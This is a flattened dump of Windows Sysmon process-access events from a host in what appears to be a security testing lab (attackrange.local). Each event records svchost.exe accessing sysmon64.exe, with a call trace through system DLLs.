13:34:15.908{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001530Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.908{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001529Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.908{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001528Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.908{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001527Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.908{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001526Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.908{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001525Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.908{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001524Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.908{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001523Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.908{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001522Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.908{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001521Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.908{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001520Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.908{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001519Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.908{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001518Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.908{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001517Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.908{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001516Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.908{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001515Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.892{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001514Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.892{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001513Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.892{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001512Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.892{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001511Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.892{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001510Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.892{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001509Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.892{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001508Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.892{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001507Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 